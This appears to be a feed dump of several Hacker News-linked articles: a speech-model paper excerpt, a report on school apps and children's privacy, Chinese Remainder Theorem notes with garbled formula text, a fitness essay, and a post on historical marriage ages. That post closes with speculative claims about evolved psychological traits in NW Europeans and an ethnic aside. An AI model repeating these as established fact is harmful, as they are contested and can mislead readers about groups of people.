    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 31 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43204493 Fri, 28 Feb 2025 11:34:11 GMT
    <![CDATA[Emacs Writing Studio]]> thread link) | @adityaathalye
    February 28, 2025 | https://lucidmanager.org/tags/emacs/ | archive.org

    The EWS configuration follows a five-step workflow for producing written creative works:

    1. Ingestion: Reading, listening and watching to develop new ideas.
    2. Ideation: Cultivating your ideas by taking and managing notes.
    3. Production: Writing and editing.
    4. Publication: Export Org mode to PDF, ePub, word processor or a website.
    5. Communication: Tell others about your work and exchange ideas.

    The articles linked below introduce using Emacs and show how to implement the EWS workflow.

    Emacs Writing Studio is available as an e-book from your favourite retailer.

    The source files of the book and EWS configuration are also freely available on GitHub.

    ]]>
    https://lucidmanager.org/tags/emacs/ hacker-news-small-sites-43204240 Fri, 28 Feb 2025 10:56:36 GMT
    <![CDATA[You read the terms and conditions, right? For your children's classes, right?]]> thread link) | @ColinWright
    February 28, 2025 | https://www.abc.net.au/news/2025-02-27/classroom-apps-technology-kids-data-terms-conditions/104966952 | archive.org

    As schools ask parents to read hundreds of thousands of words to consent to technology usage in classrooms, who's protecting their children's data?

    When Kim Nguyen's daughter started a new year at primary school, there was one permission form that really took her aback.

    "The first impression is: 'Oh my God, there's so many things'."

    It was asking her to consent to her daughter's personal details being used on more than 20 "third party online service providers [that] are external to the school".

    A mother and daughter sit together on a bed using a tablet.

    Kim Nguyen has found it frustrating to assess the multitude of digital platforms used by students in her daughter's classroom.(ABC News: Esther Linder)

    The school was asking for permission to disclose details including her daughter's full name, date of birth, school, classroom and other identifying and personal details to all of these third parties.

    But there was little guidance about the risks or benefits of using each of these services and only generic descriptions of what they were or how they would be used ...

    ... along with a directive that parents should read the terms of service and privacy policies for all 20 platforms.

    Keep that in mind — we'll use these circles to keep track of your progress through this story and compare it to the scale of the 'homework' Kim was tasked with by her daughter's school.

    A close view of pages filled with legal text. The paper is bright orange.

    The consent form Kim received said "we encourage you to read the information provided about each online service, including the terms of use and privacy policy", which amounted to hundreds of pages of dense legalese.

    Seven long strips of paper filled with legal text and pinned to a wall. The central column is bright orange paper.

    All up, it was more than 200,000 words — about the same length as Moby Dick.

    A person looking at long strips of paper pinned to a wall and flowing out across the floor. The central column is bright orange.

    To get a better feel for how much text this really is we printed it all out and stuck it to a wall.

    A person looking at long strips of paper pinned to a wall and flowing out across the floor. The central column is bright orange.

    The longest of them — for a tool called ClassDojo — not only didn't fit on the wall, but was longer than the entire length of the large hall we were working in.

    A mess of orange paper on the floor.

    It's fair to say that Kim was drowning in information.

    It's hard to believe any parent would read it all.

    While Kim had a lot of legal detail about these services, it was all but impossible to sift through it for the clues that would let her make the decisions she was being asked to make.

    And she's not alone. As time goes on, parents are feeling less in control of their kids' online safety.

    The vast majority of parents surveyed told the Office of the Australian Information Commissioner (OAIC) that protecting their child's personal information was a major concern. But since 2020, the proportion of parents who feel in control of that privacy has dropped by 12 points, to 50 per cent. 

    Of course, not reading the terms of service is such a universal experience that there are hundreds of memes about it. It's safe to say many parents extend that practice to signing up for things on behalf of their children, and for good reason: if you attempt to read the terms it very quickly starts to feel like a pointless and endless exercise.

    But these agreements can have serious, unexpected consequences.

    ClassDojo  — a classroom management and communication platform that tries to encourage good behaviour through gamification — is one of the most popular apps for primary schools and is one that's listed in the consent form used by Kim's daughter's Brisbane public primary school.

    Taken together, ClassDojo's terms of service and privacy policy (in orange above) clock in at just over 40,000 words. Let's use that as a benchmark to get a feel for how long this school is asking parents to spend on the task of assessing the risks and benefits of allowing their child to use it.

    Thanks for sticking with it! In the same time you would have read just 1 per cent of the ClassDojo documents.

    The sheer scale isn't the only problem. Even if parents take the time to read these documents, it's really hard to properly understand what they're saying. And some of that is possibly deliberate given findings by experts on how companies exploit and share students' data in ways parents and students alike find objectionable.

    While Kim took the task of giving (or withholding) consent on behalf of her daughter seriously, she found little point in reading the policies.

    "It's too much information … and some of the information, I can't really tell what's the difference," she said.

    Why are these documents so long and difficult to understand?

    Tegan Cohen researches digital platforms and privacy law at Queensland University of Technology, and she says it all starts with legislation.

    "Often what companies are trying to do when they draft these privacy policies is future proof," she says.

    A portrait of Tegan Cohen. She is smiling at the camera, has long dark hair and is wearing hoop earings.

    "You'll see purposes like — we'll collect data about your use of this service for analytics purposes to improve our service — and that could mean really any number of things."(Supplied: Tegan Cohen)

    "Basically, once you collect personal information, you're only allowed to use it for the purpose that you originally collected it for." 

    That is, what they say they'll use it for in their privacy policy. So that means companies tend to describe the types of data collected and the ways they might use it as broadly as they can.

    So parents end up trying to decipher phrases like this:

    "In addition to the uses mentioned above, we use the information we collect from students and Outside School Child Users to provide and improve (as allowed by law) the Service to the child, for educational, security and safety purposes, as authorized by law, or to enforce our Terms."

    Just establishing what data is collected about children by each service can be a challenge, let alone understanding why they need it and how they use it.

    The consent form Kim was asked to sign requested permission to share each of the following data points with more than 20 services:

    • full name;
    • gender;
    • date of birth;
    • student school username;
    • student school email;
    • student ID number;
    • school name;
    • year level;
    • class;
    • teacher; and
    • country.

    Permission form showing types of personal information to be put in to third-party online services used in a Queensland classroom

    A small portion of the long consent form used by a Queensland public primary school.

    The school's form clears the release of all of that data even if the third parties themselves don't ask for it.

    But it doesn't make clear why, for example, any of that would be needed for students to use Quizlet, which according to the consent form is "an online learning tool that allows users to create quizzes, flash cards and games".

    Known data breaches are 'tip of the iceberg'

    The collection of data is not the only issue. What happens to that data once it's stored? Globally, the education sector is a big target for malicious actors. 

    The organisation K-12 Security Information eXchange (K12 SIX) has tracked thousands of cyber security incidents at schools in the US, and says third party 'edtech' vendors are responsible for the majority of breaches.

    Data breaches and leaks are also the most common type of incident, with most affecting student data. 

    K12 SIX founder Doug Levin says the publicly disclosed breaches are just the tip of the iceberg. 

    A portrait of Doug Levin. He is smiling at the camera and wearing a dark business suit, white shirt anda blue tie.

    "I'm reporting on what's above the water line, not below, and we have a sense that there's a lot more happening below the water line."(Supplied: Doug Levin)

    And we don't really know how long these companies can keep data for.

    "What's important to know is, at least in the US context, many of our data systems include information not just about current students and staff, but former students and staff. Sometimes five, 10, even 20 years since they attended the institution," Mr Levin said.

    Remember, ClassDojo is just one of more than 20 services Kim was asked to give consent for. If one of them suffered a data breach how would it affect your child? Would you even know if there was a breach?

    Do we know how big this problem is?

    Unfortunately, Australia has no similar tracking of data leaks or cyber security incidents affecting educational institutions like schools. The notifiable data breaches reporting scheme, administered by the OAIC, does track the sector for reported breaches, but there are important gaps.

    The OAIC provided us with what statistics it could about the education sector, but cautioned "the Australian Privacy Act and therefore the Notifiable Data Breaches scheme generally does not apply to public schools and universities (other than private universities and the Australian National University)".

    Even with those caveats, there have been hundreds of data breaches affecting the Australian education sector since the scheme began operating in 2018 — figures that would include third-party vendors.

    Almost 40 per cent of those breaches are classified as "malicious or criminal attacks".

    What we don't know is how many students were affected, what systems were breached — or exactly what happened to students' data.

    Is anyone in charge taking these risks seriously?

    Anna Bunn, an associate professor at Curtin Law School and researcher in the ARC Center of Excellence for the Digital Child, has been investigating how education authorities assess the tech products used in schools and found it difficult to get any clear information on the methodologies being used by state education departments.

    "We argue that these obligations require schools to go beyond mere legal compliance," Dr Bunn said.

    Portrait of Anna Bunn who is smiling at the camera. She has shoulder length blond hair and is wearing a black and white shirt.

    "There are serious, acknowledged limitations to the current consent-based information privacy regime applicable in Australia."(Supplied: Anna Bunn)

    When the ABC asked the Queensland Department of Education about its assessment processes, a spokesperson told us: "Before being adopted by individual state schools, third-party online services are assessed against the nationally endorsed Safer Technologies for Schools (ST4S) framework to ensure they meet appropriate standards for information security and privacy."

    ST4S is an initiative, cited by multiple experts and administrators we spoke to, run by Education Services Australia (ESA), a not-for-profit company owned by Australia's state, territory and federal education ministers. It aims to create "a standardised approach to evaluating digital products and services used by schools across Australia and New Zealand against a nationally consistent security and privacy control framework."

    After ABC News sought clarification on its statement, the Queensland Education Department admitted that in fact not all services for which schools seek parental permission have been through the ST4S assessment.

    When a product or service hasn't been through that process, it's "the responsibility of principals to assess its suitability", the department said.

    The principal's assessment "may involve reviewing the service’s privacy policies, security measures, and educational value to ensure alignment with relevant guidelines and best practices." When we asked for further details about those guidelines and best practices, we were sent links to two documents that cover obtaining and managing consent but not guidelines or best practices for assessing suitability or safety of the services.

    In effect, this appears to push responsibility for evaluating these services back onto parents via the consent process.

    Education Services Australia CEO Andrew Smith says that since 2019, when the ST4S initiative started, 340 tech products have been through the assessment.

    About 150 more have either been assessed as non-compliant or pulled out of the process part way though.

    Even so, many digital products used in classrooms have not been through the ST4S assessment and so would rely on departmental or school principal-led evaluations.

    How many products used in schools have not been assessed?

    That is "very hard to calculate because it changes almost daily", Smith said. But by his estimation "the majority of the most commonly used products" in Australian schools have been assessed through ST4S.

    There's no way to verify that because ESA will not make the list, nor the ratings of assessed products, available. In fact, it declined to provide even an example report or summary statistics beyond the total number of assessments done.

    Despite the lack of transparency around specific evaluations, Dr Bunn sees ST4S — which does at least publish detailed documentation on their framework — as a marked improvement over departments and schools doing their own assessments. In a recent paper together with Associate Professor Luci Pangrazio from Deakin University, Dr Bunn looked extensively at ST4S and other processes run by education departments in Victoria, New South Wales and Western Australia.

    "Full [ST4S] assessment of the product is rigorous and detailed and can take up to six months," they write.

    "This differs markedly from practices in several states and schooling sectors, where edtech vendors are simply required to complete a questionnaire without necessarily providing supporting evidence."

    Is parents' consent really voluntary?

    "I wonder how voluntary the consent really is because one of the things they're supposed to specify in a collection notice is what are the consequences for you, and I guess in this case, your child, if you don't agree," said Dr Cohen.

    The consent form used by Queensland state schools does answer that question ... to a degree. It says that it is not compulsory for parents to provide consent and that not consenting "will not adversely affect any learning opportunities provided by the school to your child".

    It's hard to see what these educational apps bring to the classroom if students who aren't allowed to use them genuinely don't miss out on any learning opportunities. But even if that's plausible, parents and academics we spoke to pointed out that there could be social and emotional impacts for children whose parents withhold consent.

    Having previously withheld consent for these classroom apps, Kim Nguyen has come to the conclusion that by grade five her daughter was missing out on too much.

    A girl with long dark hair wearing a backpack walks out the garden gate on her way to school.

    Kim Nguyen's daughter leaving for school.(ABC News: Esther Linder)

    "So we basically said no to everything until this year, where it's almost like compulsory. And it's compulsory in the sense that if my daughter doesn't use it, she feels excluded from the class.

    "The problem is the kid will see another kid using it and they feel different."

    Is there a better way?

    Most parents the ABC spoke to said that ultimately they have to trust that the products chosen by schools are safe and effective learning tools, but were unsure if they could.

    Why, for instance, were they being asked for permission to share so many personal details with so many third parties when that didn't seem at all necessary to use the platforms in question?

    Researchers like Dr Bunn are pleased to see progress through initiatives like ST4S which has been evolving beyond a simple compliance exercise to a more sophisticated risk assessment approach taking into account issues like the commercial exploitation of children's data.

    Dr Bunn also points to recent changes to the Privacy Act which tasks the OAIC with developing a Children’s Online Privacy Code, suggesting this might have some implications for edtech vendors.

    What would help parents?

    For busy parents, reading and understanding 200,000 words of dense legal text is still an all but impossible task.

    Education Services Australia has ideas about moving beyond just looking at risk to include ethical issues and educational impacts in their assessments, but unless it can make assessments public, that won't provide any useful guidance to parents.

    Among parents we spoke to there was a strong desire for clearer and more meaningful communication about the platforms their kids were using and what the benefits were.

    Parents make decisions every day about how their children use technology in the digital age; in some ways it's a never ending task. But by asking parents to make these judgements while also withholding product assessments and ratings, education authorities seem to be making parents' lives harder than they need to be.

    You've made it to the end! 

    If you were Kim though, you'd be just 6 per cent through the ClassDojo documents. Then just another 19 apps (or 160,000 words) to go!

    Credits

    Posted , updated 

    ]]>
    https://www.abc.net.au/news/2025-02-27/classroom-apps-technology-kids-data-terms-conditions/104966952 hacker-news-small-sites-43204133 Fri, 28 Feb 2025 10:44:16 GMT
    <![CDATA[Turning my ESP32 into a DNS sinkhole to fight doomscrolling]]> thread link) | @venusgirdle
    February 28, 2025 | https://amanvir.com/blog/turning-my-esp32-into-a-dns-sinkhole | archive.org

    Unable to extract article]]>
    https://amanvir.com/blog/turning-my-esp32-into-a-dns-sinkhole hacker-news-small-sites-43204091 Fri, 28 Feb 2025 10:39:01 GMT
    <![CDATA[Explicit Chinese Remainder Theorem]]> thread link) | @boogiemath
    February 28, 2025 | https://boogiemath.org/notes/misc/notes-6.html | archive.org

    Let pip_i coprime positive integers for i=1,...,Ki=1,...,K. Let aia_i be an integer satisfying 0ai<pi0 \leq a_i < p_i for each ii.

    The Chinese Remainder Theorem (CRT) provides a way to determine an integer aa such that:

    a=a1modp1a = a_1 \; mod \; p_1

    ......

    a=aKmodpKa = a_K \; mod \; p_K

    To determine aa, we proceed as follows. Define:

    P=p1pKP = p_1 \cdots p_K

    Pi=PpiP_i = \frac{P}{p_i}

    ti=Pi1modpit_i = P_i^{-1} \; mod \; p_i

    The value aa can be constructed as:

    a=i=1KtiPiaia = \sum_{i=1}^K t_i P_i a_i

    It’s clear that a=aimodpia = a_i \; mod \; p_i because

    tiPiai=1ai=aimodpit_i P_i a_i = 1 a_i = a_i \; mod \; p_i

    and

    tiPiai=0modpjforijt_i P_i a_i = 0 \; mod \; p_j \; \; \text{for} \; i \neq j

    The value aa is unique up to modulo PP, but it we do not know the integer rr for which:

    rPa<(r+1)Pr P \leq a < (r+1)P

    For example, in lattice-based cryptography, the integer aa is sometimes represented as (a1,...,aK)(a_1, ..., a_K) for performance reasons. However, at some point, one needs to reconstruct aa from (a1,...,aK).(a_1, ..., a_K). In these cases, a<P|a| < P (in fact, a<P2|a| < \frac{P}{2} because the values are centered around 00). So, how can we reconstruct aa?

    This is where the explicit CRT (opens new window) comes into play. Let’s express aa a bit differently:

    a=Pi=1Ktipiaia = P \sum_{i=1}^K \frac{t_i}{p_i} a_i

    We define (which is generally not an integer):

    z=i=1Ktipiaiz = \sum_{i=1}^K \frac{t_i}{p_i} a_i

    Let’s define uu to be congruent to aa, satisfying

    u=amodP,0u<Pu = a \; mod \; P, \;\;\; 0 \leq u < P

    It holds:

    Pz=u+rPPz = u + rP

    P(zr)=uP(z - r) = u

    If it holds u<P2|u| < \frac{P}{2}, then zr<12z-r < \frac{1}{2}. That means:

    r=round(z)r = round(z)

    So we can compute uu as:

    u=PzPround(z)u = P \cdot z - P \cdot round(z)

    ]]>
    https://boogiemath.org/notes/misc/notes-6.html hacker-news-small-sites-43203708 Fri, 28 Feb 2025 09:46:44 GMT
    <![CDATA[Doing the impossible is easier than you think]]> thread link) | @mrccc
    February 28, 2025 | https://www.marcnitzsche.de/doing-the-impossible-is-easier-than-you-think/ | archive.org

    Here's how I did the impossible.

    I wanted to do 100 burpees in under 5 minutes. That’s 1 burpee (a pushup and squat jump) every 3 seconds. This is what doing it looked like in my head:

    In other words: it looked difficult. Hard. Basically impossible. The first time I tried, it took me almost 12 minutes and I nearly died with my lungs on fire.

    Over time, I pushed myself harder, got the time lower, and improved. In the span of weeks, I got it down to just under 7 minutes (still nearly dying of exhaustion every time). It seemed like I'm improving, and the difficulty went down:

    Screenshot 2025-02-27 at 09.48.08.png

    But one thing remained clear: doing 100 burpees in 5 minutes was still super close to impossible.

    This changed when I saw a video of someone doing it in 3 minutes and 33 seconds.

    I thought 5 minutes was otherworldly and difficult. Then this guy did it in almost half the time! I was outraged!! 5 minutes was supposed to be hard, but this guy did even better!

    So reluctantly my mind updated its estimate. If he could do it in 3:33, it couldn’t be that hard to do it in 5:00. Must be much easier than I thought:

    Screenshot 2025-02-27 at 09.52.02.png

    The next day, I did what I thought was impossible: 100 burpees in 4:59.

    Just because I watched a damn video.

    Your beliefs determine the difficulty

    Everything has a true difficulty (how hard it actually is for you). But you experience the difficulty based on your beliefs.

    It’s personal (because something that might be trivial for you might be extremely hard for me). And of course, it changes over time as you improve (e.g. body adapting after exercising, so next time it’s easier).

    For the burpees, the difficulty spectrum might have looked something like this:

    Screenshot 2025-02-27 at 10.12.49.png

    So actually, it should've been easier than I thought. The green arrow was always there – while my expectations, the red arrow, moved around. But the difficulty I experienced was still as big as what I believed it to be:

    Screenshot 2025-02-27 at 13.33.37.png

    That means I experienced more difficulty than was necessary!

    Screenshot 2025-02-27 at 13.35.18.png

    To put it another way: Things are at least as hard as you think they are.

    There's almost no upper limit to how hard something is for you, only a lower limit. The difficulty you experience is always at least the true difficulty, and after that only depends on your beliefs.

    Screenshot 2025-02-25 at 13.20.47.png

    If you expect the difficulty to be higher, you’ll experience more of it.

    The Magic Threshold Of Possibility

    Of course there are cases where you expect the difficulty to be very high and then you “just do it” and it wasn’t as bad as you thought it would be.

    Screenshot 2025-02-27 at 14.56.51.png

    I think this happens when the true difficulty and the expected difficulty are too far apart from each other. And once you try, you immediately realize that your expectation was wrong.

    The problem is that the expectation can also be too high. This is when something seems so hard you don't even try. It's above your Magic Threshold of Possibility because it's too close to impossibility:

    Screenshot 2025-02-27 at 13.42.20.png

    It's like the parable of the eagle hatching in a chicken's nest. It grows up believing it’s a chicken and that chicken can’t fly. So it comes to believe that it cannot fly either. It’s happy flapping its wings, but it never soars.

    Don’t be that eagle!

    How to update your difficulty

    But then how do you change your expected difficulty?

    The expected difficulty is a belief about yourself and the world. You use it to make predictions about the future and use those predictions to determine your actions. But the belief could be wrong, which would make your predictions and actions wrong.

    Here are some ways to make those beliefs more accurate.

    Studying and trying

    By studying the problem and other people’s accomplishments (like watching the 3:33 burpees video), you can quickly update your beliefs if they differ too much from reality. What one person can do, another can do too.

    Another way to change your belief is to just do it, to try and test it. If it shows that your belief is wrong, you’ve effectively changed it and reduced the expected difficulty.

    This works both ways – if you expect something to be too easy, then learning about it and trying will bring you closer to its true difficulty.

    Screenshot 2025-02-27 at 14.43.43.png

    Increasing the difficulty

    Paradoxically, increasing the difficulty (e.g., choosing a harder goal) can decrease the difficulty of the thing you originally wanted to do.

    Screenshot 2025-02-27 at 13.40.30.png

    If I update my goal from 5 minutes to 3:33, then 5 minutes feels like just another little milestone along the way. It's not as significant anymore. In my mind, what's really hard now is the new goal, and everything else is just a step along the way.

    Introspection

    You can challenge your belief about the difficulty by thinking from the opposite direction. Sometimes you don't even entertain the thought that your life could be... well, easier. So just ask:

    What would this look like if it were easy?

    ...and see what you come up with.

    Screenshot 2025-02-27 at 15.04.16.png

    Your beliefs shape your reality

    The truly difficult thing to realize is how many things in life this applies to It's pretty obvious with goals you set for yourself. Because goals, almost by definition, are "attainable,” even if they seem difficult.

    But what about all the things that you don’t even think about because you subconsciously dismiss them as “too impossible”? The problem is that those things aren’t visible to your conscious mind. Because as the lens through which you see the world, your beliefs filter them out.

    What else are you secretly capable of, but too scared to attempt? Maybe the real limit isn’t your ability. It’s your beliefs.


    Enjoyed this? Subscribe below to receive the next piece in your inbox.

    ]]>
    https://www.marcnitzsche.de/doing-the-impossible-is-easier-than-you-think/ hacker-news-small-sites-43203528 Fri, 28 Feb 2025 09:21:50 GMT
    <![CDATA[People did not used to marry early in the good old times]]> thread link) | @MrBuddyCasino
    February 28, 2025 | https://www.emilkirkegaard.com/p/people-did-not-used-to-marry-early | archive.org

    If you look at a plot of age of first marriage and age of first birth (usually following marriage), you might get the idea that the 1960s cultural revolution, feminism or general leftism have caused a historically unique delay in childbearing:

    However, this is not actually true. Despite what you might have heard about marrying at 20 or whatever in Victorian England, this was not the norm. The misperception may result from people consuming media relating to upper class or nobility/royal marriages, which were earlier and more often arranged for political reasons. Here's a long time series for marrying in England and Wales:

    There are two problems with the figure. First, it concerns all marriages not just the first. Probably most marriages were first marriages given the culture and law surrounding divorce, but some were not. Second, even if marriage was earlier, first child was not necessarily immediately after marriage. The authors explain the relevance of the findings:

    Relatively late marriage in Britain and across a swath of North-West Europe is linked to something called the ‘European Marriage Pattern’. The key characteristic of this is that young couples usually set up a new household on marriage.

    Establishing a new household involved the considerable expense of purchasing the cooking pots, blankets and tools they would need to equip their new home, and consequently both men and women would spend their late teens and early twenties earning money and saving some of it in preparation for marriage. Sometimes they would continue to live with their parents while doing this, but it was quite common to take a position as a domestic or farm servant which involved lodging with their employer.

    This process of working and saving pushed marriage ages into the mid-twenties for both men and women. It also had the effect of making marriage responsive to the economy, as when wages were low it took longer to save for marriage, but when wages were high people were able to marry a bit earlier. In this way the long fluctuations in marriage age until about 1750 have been attributed to extended economic cycles.

    The period referred to as the industrial revolution was characterised by a large increase in factory labour, and the comparatively high wages of factory work, together with the security it offered, meant that people could afford to marry at younger ages.

    This (NW) European Marriage Pattern is the same thing as the Hajnal line map (after John Hajnal, a Hungarian Jew, curiously, a German Nazi called Werner Conze came up with it before):

    So comparatively late marriage is not a new thing, it is the old thing. We don't know exactly how old, but the British data above suggests at least since the 1500s.

    What about age of first birth specifically? Here is some comparative data:

    Between the 7 countries, they don't even have the same lowest point. It looks like Russia reached their minimum only after the fall of communism around 1995, while USA reached it already in 1960, Sweden in 1972 (but hard to say for sure). Here's another time series with different countries for first marriages:

    Concerning again marriage, here's Danish marriage data by first vs. all:

    Helpfully, this time we have first marriages. Denmark reached its low point in 1967, whereas only 100 years ago, the average first marriage age for men was 28 and 25 for women. Helpfully, I found a matching time series for age of mothers:

    The one datapoint from 1850 comes from a detailed study of a regional church's notes, and should be roughly representative of Denmark at the time. Assuming it is, we can see that though Danish women may have married first at around 23, their first child was usually around 26. And in 1850, the age of first birth was about the same as the modern values.

    I also found marriage data for USA directly from the censuses:

    Again, we see that the lowest point is around 1960, whereas in 1890, the age for women was the same as in 1980 (22, still quiet young), and 26 for men (same as in 1990). The USA is clearly an outlier compared to the European nations, probably has something to do with settler and migration culture (marry and move to the USA, or move to USA and marry someone quickly). Note also that USA has abnormally low first marriage ages for women in the 1800s (in the plot with 9 countries).

    It is surprisingly difficult to find these historical time series since almost all research one finds when searching for "age at first birth" is concerned with age at first birth are medical studies that seek to show this is associated with negative outcomes. Similarly, one can look between countries and get the same result. This suggests to readers that delayed childbirth is good (and lower fertility is good, hence pressuring poor countries to adopt fertility reductions). Actually, only recently, early marriage was associated with stronger economic growth:

    A decrease followed by an increase in the age of marriage was observed in the twentieth century in all advanced economies. This stylized fact is intriguing because of the non-monotonic relationship between age of marriage and economic growth. Today, a high level of economic development is associated with late marriage, but for most of the twentieth century the opposite was true: economic growth was associated with early marriage. Studies published around the middle of the century document the trend toward an earlier marriage. For example, Newcomb (1937) writes with respect to the United States that

    “Today the prospect of marriage and children is popular again; 60 percent of the girls and 50 percent of the men would like to marry within a year or two of graduation… boys and girls tend to take it for granted that they will be married, as they did not a decade ago.”

    Almost 35 years later, Dixon (1971) writes that

    “The trend away from the ‘European’ pattern is most obvious in the wealthier nations of the West, especially in the English-speaking nations overseas and in England, France, Belgium and parts of Scandinavia. These are also countries with increasingly assertive and independent youth who are taking advantage of the opportunities to marry young that the wealthy and secure economies provide.”

    The decades that followed have shown that the downward trend in the age of marriage was temporary. The age at first marriage has climbed sharply since the 1960s in the United States and advanced parts of Europe and since the 1970s and 1980s also in Southern Europe and Ireland. This upward trend reached the former Communist Eastern European countries in the 1990s.

    This delayed marriage pattern in NW Europeans was because of neolocalism, the cultural pattern that newlyweds move out to a new place. Since buying or renting a place required first establishing a career, this caused some delay. However, it also caused a selection effect as not everybody could succeed in this game. Hence, we see relatively large numbers of childless women (20-25%), which is not seen in historical data from other civilizations. Thus, plausibly, neolocalism is associated with faster natural selection for traits allowing people to succeed in this game, that is, human capital. Furthermore, due to the fact that people didn't live with their relatives, their social mobility would be more mobile as they could move somewhere else to pursue a more gainful career (for the man usually). This should result in higher economic efficiency. The combination of also avoiding cousin marriages would tend to make people less inbred and less nepotistic. These patterns together probably explain the unique psychological package found in NW Europeans.

    Discussion about this post

    ]]>
    https://www.emilkirkegaard.com/p/people-did-not-used-to-marry-early hacker-news-small-sites-43203127 Fri, 28 Feb 2025 08:21:49 GMT
    <![CDATA[Show HN: Bluesky has no built-in analytics so I created them]]> thread link) | @danilofiumi
    February 27, 2025 | https://www.caterpace.blue/index/ | archive.org

    Consistency Is the Key. You heard that, didn't you?

    Are you struggling to build an audience? You’re not alone. The problem isn’t always the quality of your content—it’s the lack of consistency, and that’s is due to 👇

